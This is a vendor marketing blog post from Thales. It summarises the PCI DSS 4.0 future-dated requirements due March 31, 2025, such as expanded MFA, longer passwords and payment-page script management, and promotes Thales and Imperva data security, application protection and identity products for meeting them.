Romain Deslorieux | Director, Strategic Partnerships | Thales
More About This Author >
Romain Deslorieux | Director, Strategic Partnerships | Thales
More About This Author >
The March 31, 2025, PCI DSS 4.0 deadline compliance is fast approaching. If you’re fully prepared—fantastic! But if you’re still working through the final steps, don’t worry—you’re not alone. Meeting the new “future-dated” requirements can feel overwhelming, but compliance is within reach with the right approach and the right solutions. Let’s break down what’s changing, why it matters, and how Thales and Imperva (a Thales company) can help you confidently navigate the final stretch.
Why is PCI DSS 4.0 Compliance Important?
Complying with PCI DSS 4.0 is important for several reasons. Obviously, there are financial consequences for non-compliance - ranging from $5000 to $100,000 a month - but it’s important not to view PCI DSS solely as a regulatory burden but also as a business enabler.
A staggering number of consumers engage in credit card transactions daily. You want to ensure that they’re using your services. Of course, seamless user experience is important, but, ultimately, consumers will only use your services if they’re confident you’ll protect their data – the Thales 2024 Consumer Digital Trust Index found that across industries, consumers place high importance on both an online experience and data security. PCI DSS compliance proves you’re worthy of handling customer data.
Understanding PCI DSS 4.0’s Future-Dated Requirements
Although PCI DSS 4.0 was first released in March 2022, its future-dated requirements only come into force on March 31st, 2025. This is because the PCI Security Standards Council (SSC) recognized that these requirements might require significant changes to an organization's systems, processes, or technologies.
However, again, don’t stress: Thales and Imperva’s solutions can help you meet many of these requirements. But we’ll get to that later. First, let’s look at what those future-dated requirements are:
- Expanded MFA Implementation: MFA will be required for all access into the Cardholder Data Environment (CDE), not just for remote access. This means implementing MFA for both local and remote access to systems within the CDE.
- Increased Password Length: The minimum password length will increase to twelve characters unless a system does not support this length, in which case the minimum remains at eight characters.
- Password Management: Passwords must not be hard-coded into applications or system accounts, and application and system account passwords must be changed periodically.
- Automated Application Protection: Public-facing web applications must be protected by an automated technical solution, such as a web application firewall; manual application reviews will no longer suffice.
- Script Management: Payment page scripts must be managed to ensure authorization and integrity, preventing unauthorized modifications.
- Annual Reviews: Cryptographic suites and protocols in use must be formally reviewed annually, including active monitoring of industry cryptography trends - see the need for crypto agility because of post-quantum cryptography.
- Enhanced Training Programs: Security awareness programs must be reviewed and updated annually to address topics such as phishing, social engineering, and acceptable use of end-user technologies.
Solutions That Can Help
If your organization has yet to comply with PCI DSS 4.0, Thales and Imperva solutions can help address almost all the future-dated requirements. Here’s how.
Data Security
Thales Data Security solutions are integral to ensuring PCI DSS 4.0 compliance. Our solutions discover, classify, and protect card data with encryption and tokenization, all underpinned by FIPS-validated key management.
Moreover, CipherTrust Transparent Encryption secures data at rest, wherever it resides. We also provide real-time monitoring and machine-learning anomaly detection to identify potential threats, while automated remediation instantly handles any vulnerabilities. Together, these solutions protect and encrypt card data so you can achieve seamless PCI DSS 4.0 compliance.
Application Protection
Imperva’s automated application and API protection platform secures web applications and APIs from attackers. It combines WAF, bot management, API security, and runtime protection to defend against OWASP Top 10 threats, bot attacks, and API vulnerabilities, ensuring application availability, data protection, and compliance with PCI DSS 4.0.
What’s more, the platform includes Client-Side Protection, granting visibility into the 3rd party scripts used by your websites and your own scripts run by your protected websites that are part of the client side. This means you can easily understand the scripts running on your critical paths where sensitive customer data is entered and comply with PCI DSS 4.0.
Identity and Access Management (IAM)
Thales’ Identity and Access Management (IAM) solutions help meet the expanded MFA implementation requirement. Our solutions provide diverse authentication methods (including passwordless and risk-based), granular access control, and seamless integration across all CDE systems, bridging the local/remote access gap and simplifying compliance.Passwordless authentication ditches passwords altogether, enhances security, improves user experience, and meets PCI DSS 4.0 requirements. Thales Passwordless 360 offers seamless, secure login with biometrics, FIDO2 keys, and more, eliminating password vulnerabilities.
For more information on PCI DSS 4.0 and how Thales and Imperva solutions can help you comply before the March 31st deadline, check out our respective information pages here and here.